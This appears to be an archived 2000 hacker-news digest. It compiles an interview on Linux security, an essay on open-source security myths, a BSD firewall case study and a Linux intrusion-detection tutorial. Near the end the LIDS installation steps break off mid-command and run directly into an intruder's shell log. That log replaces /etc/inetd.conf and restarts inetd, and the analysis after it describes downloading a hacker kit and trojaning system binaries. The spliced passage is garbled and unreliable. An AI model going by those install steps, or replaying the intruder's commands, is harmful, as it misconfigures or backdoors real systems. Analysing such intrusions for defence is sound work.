connections to the httpserver and only ftp connections to the ftpserver and so on) and having and IDS monitoring network traffic. LinuxSecurity: What do you think the most common Linux security vulnerability is? How would you recommend an administrator fix this? Frank: The possibility of easy exploiting of buffer overflows. Most buffer overflows can be stopped by patches like the nonexecutable stack http://www.openwall.com/linux and packetstorm to see my 2.3.99-pre5 version of it) patch for the Linux kernel and compiler addons like stackguard. LinuxSecurity: Do you think open-source software has the potential for being more or less secure than closed-source software? Frank: There are two sides to this story, if the same program was available in both open and close sourced version. They are insecure at the same rate. But because you get the source code of the open-source program it is very easy to search for bugs. Then two things happen. The bugs get reported and exploits are made for those bugs. This makes the open source program having less bugs then the same closed source program but also there are more exploits around and there will be more bugs to be found in the future. This doesn't say it is impossible to disassemble the closed source program and find the bugs in that one too. Then the same happens for the close source version but at a slower rate because the source is harder to get and to read (would be ASM instead of easy C or some other fancy language). Open source software is more secure than closed source because good coders can use disassembling techniques on closed source programs to find vulnerabilities. I would rather have the open source version so it can compiled with stackguard. LinuxSecurity: What do you think motivates "black hats" to damage/destruct systems? Frank: It is the kick of gaining access and power motivating the "black hats" to hack systems. The damage and destruct is most of the times done in 2 parts. One part is to make sure they keep their full access and so most binaries are Trojan and so on. This can be because they are mad at the company they just hacked(they wouldn?t pay them for revealing the security bugs they exploited or some other in my opinion lame reason) or just because they really don't care and just want to show off (like the recent DDS attacks). LinuxSecurity: How do you feel about the mass-media's portrayal of 'hacking'? Frank: Most media focuses on the things done by stupid kids mass attacking big servers with DDS networks or doing other stupid things. This does take the heat off the real hackers. The real hackers that don't hack and don't want to be disturbed at their work of endless coding and tracing through programs. It was because Hardball and I wanted to make a statement about consideration of configuration. The media got us a little attention, we would still be unknown doing endless coding. LinuxSecurity: What do you see is in the future for information security? Frank: I would love to see administrators think twice before installing things on their boxes. Also, having kids on your company network is the last thing you want, especially when they try to trojan your sshdeamon and mess up making some boxes even unusable and forcing to full reinstall of everything because you don't know what was trojanned and what was not. LinuxSecurity: We would like to take a moment to thank Frank for taking time out of his busy schedule to share some of his experiences with us. If you have any questions reguarding this interview, please feel free to drop us an email. As always, if you have any ideas for other interviews, or any suggestions, please let us know. We want to serve you! @HWA 196.0 [HNS] May 31: MISSING FILES ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by BHZ Wednesday 31 May 2000 on 5:32 PM Auckland software developer, Phil Saleh, who found a security flaw in MS Outlook that he believes could secretly unleash a "hell virus", says files on his discovery have been stolen from his computer. Link: NZ Herald http://www.nzherald.co.nz/storydisplay.cfm?storyID Real story at this url was abducted by aliens. @HWA 197.0 [HNS] May 31: THE MYTH OF OPEN SOURCE SECURITY ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by BHZ Wednesday 31 May 2000 on 5:32 PM An author of the open source Mailman program explains why open source is not as secure as you might think - using security holes in his own code as an example. Link: Developer.com http://developer.earthweb.com/journal/techfocus/052600_security.html May 26, 2000 The Myth of Open Source Security by John Viega An author of the open source Mailman program explains why open source is not as secure as you might think — using security holes in his own code as an example. Open source software projects can be more secure than closed source projects. However, the very things that can make open source programs secure — the availability of the source code, and the fact that large numbers of users are available to look for and fix security holes — can also lull people into a false sense of security. Many eyeballs The core open source phenomenon responsible for making code secure is the "many eyeballs" effect. With lots of people scrutinizing a program's source code, bugs — and security problems — are more likely to be found. Why do programmers look at source code? Mostly for their own benefit: they've found a piece of open source software useful, and they want to improve or change it for their own specific needs. Sometimes too, source code attracts scrutiny just to make sure it meets certain needs, even when there's no intention of modifying it. Companies which require a high level of security, for example, might do a code review as part of a security audit. This could be done for any software product where the source is available, of course, regardless of whether it's open source or produced commercially. -------------------------------------------------------------------------- ------ Everyone using Mailman, apparently, assumed that someone else had done the proper security auditing. -------------------------------------------------------------------------- ------ Source code can also attract programmers' eyeballs simply for reasons of personal gain. Some people may explicitly wish to find security problems in the code. Perhaps they want to build a name for themselves in the security community. Maybe they're motivated by altruism or a belief that others should be aware of security holes. Earlier this month, for example, two hackers broke into the open source Apache Software Foundation Web site, posted a Microsoft logo on it, and then published an explanation of how an improperly configured Apache server allowed them access. Many others share information about security vulnerabilities in less intrusive ways, such as posting to discussions on the Bugtraq mailing list. And, unfortunately, there will probably always be some people scrutinizing source code because they want an attack that no one else has — in which case, you're not likely to gain much from their eyeballs. Eyes that look do not always see With people motivated to look at the source code for any number of reasons, it's easy to assume that open source software is likely to have been carefully scrutinized, and that it's secure as a result. Unfortunately, that's not necessarily true. Lots of things can discourage people from reviewing source code. One obvious deterrent: if the code looks like a big tangled mess, you'll get fewer eyeballs on it. And as we discovered while writing Mailman, the GNU mailing list manager, anything that makes it harder for the average open source user to hack means fewer eyeballs. We wrote Mailman in Python, which is nowhere near as popular as C, and often heard from people who would have liked to help with the development, but did not want to have to learn Python to do it. People using open source programs are most likely to look at the source code when they notice something they'd like to change. Unfortunately, that doesn't mean the program gets free security audits by people good at such things. It gets eyeballs looking at the parts of the code they want to change. Often, that's only a small part of the code. What's more, programmers preoccupied with adding a feature generally aren't thinking much about security when they're looking at the code. And, unfortunately, software developers sometimes have a tendency to ignore security up front and try to bolt it on afterwards. Even worse, most developers don't necessarily know much about security. Many programmers know a bit about buffer overflows, and are probably aware of a handful of functions that should be avoided. But many of them don't understand buffer overflows enough to avoid problems beyond the handful of dangerous calls they know. And when it comes to flaws other than buffer overflows, the problem gets worse. For example, it is common for developers to use cryptography, but misapply it in ways that destroy the security of a system, and it is also common for developers to add subtle information leaks to their programs accidently. It's really common to use encryption that is too weak and can easily be broken. It's also common for people to exchange cryptography keys in a way that's actually insecure. People often try to hand roll their own protocols using common cryptographic primitives. But cryptographic protocols are generally more complex than one would expect, and are easy to get wrong. Far too trusting So despite the conventional wisdom, the fact that many eyeballs are looking at a piece of software is not likely to make it more secure. It is likely, however, to make people believe that it is secure. The result is an open source community that is probably far too trusting when it comes to security. -------------------------------------------------------------------------- ------ Until this week, the version of Mailman which contains these security holes was included in Red Hat Professional Linux version 6.2. -------------------------------------------------------------------------- ------ Take the case of the open source mailing list manager Mailman, which I helped write. Mailman is in use running mailing lists at an impressive number of sites. For three years, until March 2000, Mailman had a handful of glaring security problems in code that I wrote before I knew much about security. An attacker could use these security holes to gain access to the operating system on Linux computers running the program. These were not obscure bugs: anyone armed with the Unix command grep and an iota of security knowledge could have found them in seconds. Even though Mailman was downloaded and installed thousands of times during that time period, no one reported a thing. I finally realized there were problems as I started to learn more about security. Everyone using Mailman, apparently, assumed that someone else had done the proper security auditing, when, in fact, no one had. And if three years seems like a long time for security holes to go undetected, consider the case of Kerberos, an Open Source security protocol for doing authentication. According to Ken Raeburn, one of the developers of the MIT Kerberos implementation, some of the buffer overflows recently found in that package have been there for over ten years. The many eyeballs approach clearly failed for Mailman. And as open source programs are increasingly packaged and sold as products, users — particularly those who are not familiar with the open source world — may well assume that the vendor they are buying the product from has done some sort of security check on it. Until this week, for example, version 1.0 of Mailman, which contains these security holes, was included in Red Hat Professional Linux version 6.2. (If you're running a Mailman version earlier than 2.0 beta, allow me to suggest that you upgrade immediately. The latest version can be found on the Mailman Web site at http://www.list.org). The Myth of Open Source Security by John Viega Security: tougher than it looks Even if you get the right kind of people doing the right kinds of things, you may have problems that you never hear about. Security problems are often incredibly subtle, and may span large parts of a source tree. It is not uncommon to have two or three features spread throughout a program, none of which constitutes a security problem alone, but which can be used together to perform a security breach. For example, two buffer overflows recently found in Kerberos version 5 could only be exploited when used in conjunction with each other. As a result, doing security reviews of source code tends to be complex and boring, since you generally have to look at a lot of code, and understand it pretty well. Even many experts don't like to do these kinds of reviews. And even the experts can miss things. Consider the case of the popular open source FTP server wu-ftpd. In the past two years, several very subtle buffer overflow problems have been found in the code. Almost all of these problems had been in the code for years, despite the fact that the program had been examined many times by both hackers and security auditors. If any of them had discovered the problems, they didn't announce it publicly. In fact, the wu-ftpd has been used as a case study for vulnerability detection techniques that never identified these problems as definite flaws. One tool was able to identify one of the problems as potentially exploitable, but researchers examined the code thoroughly for a couple of days, and came to the conclusion that there was no way that the problem identified by their tool could actually be exploited. Over a year later, they learned that they were wrong, when an expert audit finally did turn up the problem. In code with any reasonable complexity, it can be very difficult to find bugs. The wu-ftpd is less than 8000 lines of code long, but it was easy for several bugs to remain hidden in that small space over long periods of time. To compound the problem, even when people know about security holes, they may not get fixed, at least not right away. Even when identified, the security problems in Mailman took many months to fix, because security was not the the core development team's most immediate concern. In fact, the team believes one problem still persists in the code, but only in a configuration that we suspect doesn't get used. An army in my belly The single most pernicious problem in computer security today is the buffer overflow. While the availability of source code has clearly reduced the number of buffer overflow problems in open source programs, according to several sources, including CERT, buffer overflows still account for at least a quarter of all security advisories, year after year. Open source proponents sometimes claim that the "many eyeballs" phenomenon prevents Trojan horses from being introduced in open source software. The speed with which the TCP wrappers Trojan was discovered in early 1999 is sometimes cited as supporting evidence. This too can lull the open source movement into a false sense of security, however, since the TCP wrappers Trojan is not a good example of a truly stealthy Trojan horse: the code was glaringly out of place and obviously put there for malicious purposes only. It was as if the original Trojan horse had been wheeled into Troy with a sign attached that said, "I've got an army in my belly!" Well-crafted Trojans are quite different. They generally look like ordinary bugs with security implications, and are very subtle. Take, for example, wu-ftpd. Who is to say that one of the buffer overflows that have been found recently was not a Trojan horse introduced years ago when the distribution site was hacked? The open source movement hasn't made the problem of buffer overflows go away. But eventually, newer programming languages may; unlike C, modern programming languages like Java or Python never have buffer overflow problems, because they do automatic bounds checking on array accesses. As with any technology, fixing the root of the problem is far more effective than any ad hoc solution. Is closed source any more secure? Critics of open source software might say that providing source code makes the job of the malicious attacker easier. If only a binary is available, the bar has been raised high enough to send most such people looking for lower-hanging fruit. But as the many well-publicized security holes in commercial software make clear, attackers can find problems without the source code; it just takes longer. From a security point of view, the advantages of having the source code available for everyone to see far outweighs any benefit hackers may gain.There are many benefits of open source software unrelated to security. And the "many eyeballs" effect does have the potential to make open source software more secure than proprietary systems. Currently, however, the benefits open source provides in terms of security are vastly overrated, because there isn't as much high-quality auditing as people believe, and because many security problems are much more difficult to find than people realize. Open source programs which appeal to a limited audience are particularly at risk, because of the smaller number of eyeballs looking at the code. But all open source software is vulnerable, and the open source movement can only benefit by paying more attention to security. Resources The Mailman web site. http://www.list.org/ The ITS4 security scanner for C code. http://www.rstcorp.com/its4 Software security for developers. http://www.ibm.com/developer/security CERT web site. http://www.cert.org/ @HWA 198.0 [HNS] May 31:INFORMATION SHARING MECHANISM ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by BHZ Wednesday 31 May 2000 on 5:31 PM The group, known as an "information sharing mechanism," will enable high technology companies to share data anonymously about software vulnerabilities and systems attacks. Link: Financial Times http://news.ft.com/ft/gx.cgi/ftc?pagename Url was eaten by my dog @HWA 199.0 [HNS] May 31:WAP RELATED DEFACEMENT ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by BHZ Wednesday 31 May 2000 on 5:30 PM t looks like probably the first site created for usage with WAP (Wireless Application Protocol) was defaced. WAP version of Italian Wappi web site (http://wap.wappi.com) was changed by De Meestervervalser. Just a note - It cannot be seen by a normal browser, but you could see it from Gelon trough their emulator. Link: Site seen with Nokia GSM Link: Screenshot (21kb) It looks like probably the first site created for usage with WAP (Wireless Application Protocol) was defaced. WAP version of Italian Wappi web site (http://wap.wappi.com) was changed by De Meestervervalser. Just a note - It cannot be seen by a normal browser, but you could see it from Gelon trough their emulator. http://www.gelon.net/cgi-bin/wapalize.cgi?url http://wap.wappi.com http://www.net-security.org/misc/wap2805.jpg @HWA 200.0 [HNS] May 31:RUNNING A BSD-BASED FIREWALL ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by BHZ Wednesday 31 May 2000 on 5:30 PM Internet security is currently a hot topic. Because of that, many smaller networks are turning toward firewalls to give them some protection. Many of these networks do not have the money to pay for a commercial firewall product, so they are moving to free Unix-based firewalls such as IP Firewall, IP Filter or IPChains. Link: BSD Today http://www.bsdtoday.com/2000/May/Features165.html Running a BSD-based Firewall FreeBSD vs. OpenBSD as a firewall platform. By Jim O'Gorman Introduction Internet security is currently a hot topic. Because of that, many smaller networks are turning toward firewalls to give them some protection. Many of these networks do not have the money to pay for a commercial firewall product, so they are moving to free Unix-based firewalls such as IP Firewall, IP Filter or IPChains. The company I work for was in a similar situation. I hope to give you some insight of why we chose the product we did, where we started, what we learned from the initial installation and also what we've changed to improve management of the network. I am not going to explain firewall rule sets at all. That is too large of a topic. For that I would suggest getting the book "Firewalls and Internet Security" by Cheswick and Bellovin (ISBN 0201633574) and consulting the documentation of the firewall product you decide to go with. Also, in this paper I will state what worked best for us at the time. What might work best for us in a year may be different. Just like what will work best for you now may be different from what we chose. Take the information in this paper, add it to information drawn elsewhere and form your own conclusion for what will be best for you. Also, keep in mind that because I may have decided that your favorite OS may not have been best for me, it is not an insult to you. Don't view OS's as a religion, because they are only tools. Nothing more. Use the best one for a given job and let it stay at that. Commercial Firewalls vs. Open Source Firewalls The first bridge that we had to cross was getting people to accept an open source firewall package. Everyone knows and trusts products like Checkpoint and Cisco's Pix firewall. A firewall is a key part of the security infrastructure. It is a stretch to ask management to trust a product, they may have never heard of, for such an important part of the network. When you buy a commercial firewall product, you are not buying a better quality product, but only paying for a name. That name gives your management and you confidence that there is a strong, solid company behind your firewall. With an open source firewall, you do not get that name. However, you do get the equivalent credibility through the very nature of open source. Anyone that uses it will be more than happy to tell you the good and the bad that they have gone through with the product. The other bonus is that open source firewalls are usually written by people that are using the product themselves. This gives them every incentive in the world of making it work right. Plus, with the open source model you can influence the direction of the program. Darren Reed of IP Filter has impressed me many times over with his openness to add features that users have asked for. You do not find that with a bigger commercial company. Our Firewall product I am a BSD guy. That is the platform I know best. With that in mind, there are two popular free firewalls we could pick from: IP Filter and IP Firewall. IP Firewall is a fine product that I have used in the past with success, but at the time it could not keep state. A stateful firewall was a requirement for this particular project, so we decided to go with IP Filter (http://coombs.anu.edu.au/~avalon/). There is a bit of a religious war about stateful vs. non-stateful (packet filter) firewalls. Don't take my word for which is better. Look through the book referenced above to see which would work best for you. I prefer to stay with a stateful firewall, because it allows me to only allow the initial Syn packet through. Then the firewall will allow the rest of that TCP session through. This prevents things like stealth scans from getting through your network. IP Filter is a nice, small, and efficient firewall that comes with the base OS of FreeBSD, OpenBSD, and NetBSD. It also runs on Solaris, SunOS, BSD/OS, Irix, and HP/UX. The cross platform nature of the product was a big feather in its cap. It would allow us to go with one Unix today, switch to a different Unix in the future, and still keep the same firewall product. The next question was: What platform are we going to run this product on? Base OS As previously stated, I am a BSD guy. So we came right out looking at FreeBSD and OpenBSD. Since this was a smaller installation, I was looking forward to using an OS which I was not as familiar with. I am more familiar with FreeBSD, which was a strike against it and gave OpenBSD a leg up. The other big issue supporting OpenBSD is the way it is marketed. If you go to http://www.openbsd.org they will be more than happy to tell you that they have "Three years without a remote hole in the default install!" and "Two years without a localhost hole in the default install!". That is very impressive. You do not go that long without a root exploit by luck. This shows a focus by the OpenBSD developers to make the default install of OpenBSD secure. Plus, IP Filter is the default firewall with OpenBSD so it makes getting up and running with OpenBSD very quick. With the hard core security that drives the OpenBSD project along with the chance to work with something new in mind, we decided that OpenBSD would be a good choice for a BSD-based IP Filter firewall. Implementation This is where the fun really is, in setting up the firewall itself. After the install of OpenBSD, all you have to do is enable IP Filter and plug in your rule set. The best source of information for setting up IP Filter is in the OpenBSD FAQ at http://www.openbsd.org/faq/faq6.html. Follow those instructions and you should be up and going in no time. The only real thing you should watch is when you write your rule sets. You really have to understand IP. Otherwise you are very likely to open up a hole in the network. Testing After the firewall is installed and the rules are written, the most important thing is testing. You cannot setup a firewall, throw it on the network and assume it works. Testing the NAT (Network Address Translation) is very easy. Simply plug a machine on the internal interface and see if it works. SSH into a box on a remote network, do a "who" and see what IP it says you are coming from. Really, NAT is kind of nice in the regard that it either works or does not. The firewall, however, is a different story. There is really no right way of testing it. What we did was go through the rule set and double check all the rules. After that, from a remote network we ran Nessus (http://www.nessus.org/), Nmap (http://www.insecure.org/nmap/index.html) and Saint (http://www.wwdsi.com/saint/) against our public IP range. You may have some different preferred tools to use for this purpose. The key is to be creative. Try what you would do if you were trying to break into that network. Use the tools that crackers trying to break in would use. After you have things looking good, you must remember to test every couple of months. No firewall is ever done. As new attacks come out, you must make sure you are defended against them. Results and Changes What we found was that the initial install went fine. The firewall was secure, the NAT worked great, and everyone was happy. Then the time came when we wanted to upgrade IP Filter to the newest version. That is when we ran into a bit of trouble. Upgrading was important to us because we wanted to have access to IP Filter's newest features and bug fixes. After some searching around, we ran into e-mails such as this one: http://www.false.net/ipfilter/2000_02/0004.html. The short of them is that it is not suggested practice to install IP Filter from source on OpenBSD, and it is doubtful it would even work. Instead, what users are suppose to do is upgrade OpenBSD to -current, where the maintainer of the IP Filter section should have the newest version integrated into the source tree. This was an issue for us. Running -current on any type of production server, much less something as key as a firewall, is not something that should be done. For those not familiar with the way BSDs work, -current is the up-to-when-you-cvsup current snapshot of the source tree of the OS. There is no guarantee that it will work, be bug free or even compile. -current is a work in progress for developers to use, and not intended for production use. So, in order to upgrade IP Filter on OpenBSD on our production firewalls we were left with two choices: either run not-yet-ready-for-production code or to not upgrade at all. Because of the chances of a problem with IP Filter coming out in the future, we decided to change to FreeBSD. FreeBSD would allow us to track -stable (a branch of the source tree meant for production use), and allow us to upgrade IP Filter from source when ever we felt like it. The Change Once you break down what you actually do on a firewall that is maintained by someone that understands firewalls, many of OpenBSD strengths don't matter. Let's give a couple of "for instances" to make sure that my point is being made clear. A home user, who may not understand Unix well, may best be served by running OpenBSD as a firewall platform. The reason for this is that the home user can do a default OpenBSD install and feel good in the fact that even if he does not know enough to turn off services, he will be at least a little protected by the fact there has been no root exploits for quite some time. True, a box is only as secure as the administrator makes it, but this type of user is not likely to change much of anything. In which case, the secure-by-default install will help them. Plus, a user like this is not likely to want to upgrade their install until the next version upgrade comes out, so the inflexibility of IP Filter on OpenBSD should not hurt them. For a use like ours, however, where the administrator will go over the box and shutdown the services they will never need, and no user logs in on the firewall, there is not much that OpenBSD will give you. OpenBSD and FreeBSD both running IP Filter, with SSH as the only other service, will be equally secure. If there are no other remote services running, there is no other way into the box. With no loss in security while gaining the flexibility of being able to upgrade IP Filter whenever needed, there was no reason not to use FreeBSD. With those facts in mind, we made the switch of OpenBSD to FreeBSD. Justification The upgrade was very simple. Install FreeBSD, install the newest IP Filter, copy over the rule sets, and we were done. With the rule set already written, there is really not much else to do. Shortly after we finished the upgrade, we felt justified for our decision. In this e-mail, http://false.net/ipfilter/2000_05/0091.html, an IP Filter user had found a bug that may have been used to exploit an IP Filter install. If this exploit had been developed then there would have been a hole in our firewall. If we had still been on OpenBSD, we would have had to choose between running -current or sticking with the old, buggy, version of IP Filter. The Future The lesson learned here is that you cannot listen to marketing, even open source marketing. Even though OpenBSD is known as "the secure OS," and a firewall is an application where you would want the utmost security, the product marketed towards that niche may not be the best choice for the application. The best thing to do is ignore the marketing, look at all the facts, and decide what is best for your install. Hopefully in the future, there will be an easier way to upgrade IP Filter under OpenBSD. Even if they make one, I do not see any reason for us to switch back. Switching back would gain us nothing. We will see what the future brings and the direction of both BSD projects and IP Filter change that might affect the way we do things. An important thing about computers in general is nothing is static, as new products come out and existing products change, you have to go with what is best at the time. More Info IP Filter - http://coombs.anu.edu.au/~avalon/ IPF(8) Manual Page from FreeBSD - http://www.bsdtoday.com/2000/May/supplement166.html inetd and inetd.conf: Managing your system's internet switchboard operator - http://www.bsdtoday.com/2000/March/Tutorials19.html @HWA 201.0 [HNS] May 24:LAPTOPS STOLEN FROM PARLIAMENT ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by LogError Wednesday 24 May 2000 on 1:09 AM Five laptop computers worth about $30,000 have been stolen from Parliament House in what appears to have been an inside job. The laptops could allow access to the parliamentary network, a Senate committee heard today. Link: Australian IT http://australianit.com.au/common/storyPage/0,3811,715221%255E442,00.html Laptops stolen from Parliament AAP FIVE laptop computers worth about $30,000 have been stolen from Parliament House in what appears to have been an inside job. The laptops could allow hackers access to the parliamentary network, a Senate committee heard today. They were taken over a short period of time from secured areas at parliament. Parliamentary official Robert Alison said the laptops appeared to have been taken by parliamentary workers or visitors with security clearance. "It seems strange to me that four or five computers would disappear in a short time, which says to me that there may be a market for them," Mr Alison said. "One of the concerns is that all five of those computers were taken from what we call the private areas of Parliament House, so presumably the person or persons who took them was a passholder of some sort." Mr Alison, the Usher of the Black Rod, said the laptops were protected by passwords but acknowledged their contents were not 100 per cent safe. @HWA 202.0 [HNS] May 24: MICROSOFT PROGRAMS VULNERABLE TO VIRUSES ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by LogError Wednesday 24 May 2000 on 12:58 AM More than 45,000 viruses infect PCs running the Windows operating system worldwide. By contrast, perhaps 35 viruses have been written for the Macintosh and four or five for the Unix-based computers that run most Web sites, says Eugene Spafford, director of the Center for Education and Research in Inormation Assurance and Security lab at Purdue University. Link: USA Today http://www.usatoday.com/life/cyber/tech/cth950.htm @HWA 203.0 [HNS] May 24:INTRUSION DETECTION ON LINUX ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by LogError Wednesday 24 May 2000 on 12:54 AM "This article focuses on several host-based intrusion detection systems that are available on Linux. In particular, I will cover some of the basics of installing setting up these packages, how they are useful, and in what circumstances they can be used. This article assumes a basic knowledge of systems security. In particular, I will assume that the most basic security measures have already been taken to secure a host against intrusion from the internet." Link: Security Focus http://www.securityfocus.com/focus/linux/articles/linux-ids.html Typical newbie fare, graphic missing from this text version, use link to ogle the chart. - Ed Focus On Linux: Intrusion Detection on Linux by David "Del" Elson last updated Monday, May 22, 2000 Articles and General Resources in this Section Subscribe to the FOCUS-Linux Mail List by Security Focus Inc. Installing Linux by Peter Merrick Securing Linux by Dale Coddington Securing Linux Pt II. by Dale Coddington Linux and IPSec by Rafael Coninck Teigao Linux Security Tools by Jonathan Day Building a Linux Bunker: Basic Firewalling by Rafael Coninck Teigao Intrusion Detection on Linux by David "Del" Elson Bastille Linux Walkthrough by Jay Beale ------------------------------------------------------------------------- ------- Relevant Links The Abacus Project Psionic Software Linux Intrusion Detection/Defense System lids.org The Linux Openwall Project Openwall RedHat RedHat RedHat kernel upgrade docs RedHat RedHat LIDS Kernel Patch lids.org Introduction This article focuses on several host-based intrusion detection systems that are available on Linux. In particular, I will cover some of the basics of installing setting up these packages, how they are useful, and in what circumstances they can be used. Systems Security 101 This article assumes a basic knowledge of systems security. In particular, I will assume that the most basic security measures have already been taken to secure a host against intrusion from the internet. These measures could include: Firewalling, to ensure that access to the various TCP and UDP ports of the system that were not intended for internet access are prevented. For example, a basic set of firewalling rules for a web server would ensure that the only TCP/IP access to the machine was on TCP port 80, the port normally used for HTTP access. Disabling daemons that are not required. For example: A web server normally needs a process running to serve web pages. Processes that are not associated with serving web pages, such as RPC/Portmap services, NFS services, X Font Server, DNS name server, and other extraneous and unused applications should be stopped or disabled. On a Red Hat Linux system, this is normally done by using one of the run level editors, for example ntsysv or tksysv, to disable the startup of any daemon or service that is not required. Disabling access to ports that are not required, by editing /etc/inetd.conf. Typically, a system will come pre-installed with access to many ports enabled in the /etc/inetd.conf file. Editing this file to remove or comment out any lines that are not required is the most basic system security activity and should be carried out on all systems. Lines of Defence Illustration 1: Multi Layered Systems Security In this article, I will discuss a multi-layered approach to systems security. Several security layers can be used independently to provide additional protection in case any of the layers should be breached. An example of a multi-layered security system is shown in illustration 1. Each layer in the diagram provides additional data protection to the layers above it. For example, the first layer is the firewall. Should an intrusion attempt not be defeated by the firewall, a second layer, the Port Sentry program, can provide additional protection. Further inside the security system are the LIDS and LogCheck programs, that provide additional protection should an intrusion attempt not be intercepted by the Port Sentry program. Monitoring Incoming Connections The first layer of protection behind the firewall is a software package that will monitor incoming attempts to connect to the machine. The PortSentry package (http://www.psionic.com/abacus/portsentry/) provides a simple and effective method of doing this. What does PortSentry do? PortSentry is a program that monitors activity on specific TCP/IP ports. Activity on the ports that are monitored by PortSentry is reported, and one of several options can be taken, including denying further attempts to access to your system from the source of the activity. This is an important defence mechanism, because a hacker will typically probe your system for weaknesses ("port scanning") before attempting an intrusion. Detecting the probe or port scan, and completely denying further access to your system by a potential hacker, robs that hacker of the ability to follow up on any port scans with a real intrusion attempt. Installing PortSentry For users of Red Hat Linux, PortSentry is available in RPM format on the Red Hat contrib FTP site. This site is mirrored in various locations around the world, check at www.redhat.com for the location of your nearest mirror. I haven't yet determined the availability of a .deb format package for PortSentry but I am sure there is one out there. For other Linux systems, installing PortSentry from the source code is relatively simple. Recommended Configuration PortSentry runs in a number of modes, including various TCP and UDP stealth modes. The mechanism that I prefer to use for running PortSentry is to bind it to a TCP port that (a) is not in use, and (b) is known in some systems to have potential for intrusion attempts. For example, port 143 (imap2), port 111 (portmap) and port 23 (telnet) are TCP ports that I do not use on my internet systems, and my web server was scanned on both of those ports in the last 24 hours. To start PortSentry in basic TCP mode, ensure that your system start-up scripts run this command somewhere: portsentry -tcp Also, ensure that the PortSentry config file (portsentry.conf) contains a TCP_PORTS line enabling scanning on the ports that you require. Response Options The "Response Options" section of the portsentry.conf file allows you to specify what response that PortSentry will take on detecting unwanted activity. The mechanism that I normally choose is to use ipchains to block further access from the source of the activity. This is done by uncommenting the following line in the portsentry.conf file: KILL_ROUTE="/sbin/ipchains -I input -s $TARGET$ -j DENY -l" On systems that receive a high level of port scanning activity, removing the "-l" at the end of the above line will prevent logging of further incoming connections, which might be useful to save space in the log files. Monitoring System Logs Firewalling systems, and software like PortSentry perform one useful function, in that they monitor and prevent connections coming in to unwanted ports on the system. This can prevent access to a system via a standard scan-and-intrude method. Where a system is required to run a particular service (eg: Apache on a web server, or BIND on a DNS server), and a hacker has uncovered a particular loophole in the service, these programs will unfortunately not achieve the result of keeping all intruders out of the system. A system acting as a DNS server that has a vulnerable copy of BIND running on it will eventually be discovered by a hacker that scans a wide range of machines for a single port (the DNS port) on each machine, and attempts intrusion against that port only. The firewall and PortSentry will unfortunately see this intrusion attempt as a legitimate access to the system. LogCheck LogCheck (http://www.psionic.com/abacus/logcheck/) is a useful program for scanning system logs for unusual activity. LogCheck works by scanning the various system log files (under Linux these are located in /var/log), and notifying the system administrator by e-mail if there is any unusual activity. Unusual messages in the log files can often be generated by intrusion attempts, or actual intrusions against your system. Installing LogCheck LogCheck is available in RPM format from the Red Hat contrib archives, and from the same sources as PortSentry. Installing LogCheck from the RPM file or from the source code (read the INSTALL file provided with the source code) is relatively simple. Configuring LogCheck LogCheck has four main configuration files. In the RPM version, these are stored in the /etc/logcheck directory. Normally, only the logcheck.ignore and the logcheck.violations.ignore files need modification. The normal process that I go through after installing LogCheck is as follows: Allow LogCheck to run once with the standard configuration files. This willl produce a large output file, which can be thrown away. 24 hours later, allow LogCheck to run again. This will detect any new entries in the log files since the last run, and will produce a smaller but still sizeable output file. Read this file carefully. For entries in the file that are of no great concern (use your judgement for this) find a specific identifying string in the entry. For entries that are in the "Security Violations" section, add the identifying string to the logcheck.violations.ignore file. For other entries (in the "Unusual System Events" section), add the string to the logcheck.ignore file. Repeat this process, once every 12 - 24 hours for approximately a week. By this stage, enough "bogus" entries will be filtered out by the strings that you have added to the .ignore files that the daily LogCheck report will contain only genuine system concerns. Note that the RPM file specifies that LogCheck is to be run hourly, but normally I only run it daily except on critical systems that need regular monitoring. This is done by moving the /etc/cron.hourly/logcheck file into /etc/cron.daily. Kernel Based Intrusion Detection Kernel based intrusion detection is a relatively new art form for Linux. The main kernel based intrusion detection system currently available is called LIDS, and is available from http://www.lids.org/. What is LIDS? LIDS is an intrusion detection and prevention system that resides within the Linux kernel. LIDS' protection is aimed at preventing the root user (who would normally have access to the entire system) from tampering with important parts of the system. LIDS' most important features include increased file system protection, protection against direct port access or direct memory access, protection against raw disk access, and protection of log files. LIDS also prevents certain system actions, such as installing a packet sniffer or changing firewall rules. LIDS Documentation The LIDS system is somewhat more complex to install than either PortSentry or LogCheck. Fortunately, the LIDS web site contains quite good documentation on the LIDS project, including installation and configuration instructions. Installing LIDS First, before installing LIDS, make sure that you have the most up to date LIDS patch (I am using 0.9), and the correct kernel version. I am using the updated kernel (2.2.14-12) from the Red Hat Updates FTP site, because this contains some security fixes. You also need the source code for the kernel that you are using. LIDS is currently targeted towards the 2.2.14 kernels. I installed LIDS on a Red Hat 6.2 system, this includes the 2.2.14 kernel. Before I installed LIDS, I obtained the updated kernel (from ftp.redhat.com/updates/ or one of its mirrors) and installed it according to the instructions at http://www.redhat.com/support/docs/howto/kernel-upgrade/kernel-upgrade.ht ml. The next thing I obtained was the updated kernel source, which also came from ftp.redhat.com/updates/ This I installed using: rpm -Uhv kernel-source-2.2.14-12.i386.rpm Next, compile and install the lidsadm program: cd /usr/local/src/security/lids-0.9/lidsadm-0.9 make make install Generate a RipeMD-160 password that will later be installed into the kernel: lidsadm -P I entered the password "anypass" and got back the key "d502d92bfead11d1ef17887c9db07a78108859e8". Next, I copied the standard Red Hat configuration file for my architecture into the /usr/src/linux directory: cd /usr/src/linux/configs/ cp kernel-2.2.12-i686.config .. Next, I installed the LIDS patch using the following commands: cd /usr/src patch -p0 > /tmp/b mv /tmp/b /etc/inetd.conf killall -HUP inetd Reading through this file, we can note the following activity: A directory with an unusual name (/usr/lib/...) was created on the system. An FTP connection was made back to the hacker's personal machine (200.192.58.201, traced to a dial-in address somewhere in Brazil), and a simple hacker-kit was downloaded. The hacker kit was uncompressed. It contained trojan binaries which were then installed on the system. The trojan binaries were used to over-write the system versions of netstat, ps, tcpd, syslogd, and pstree. These are programs that get used to report on system activity, show running processes, show open ports, etc. A backdoor process of some kind 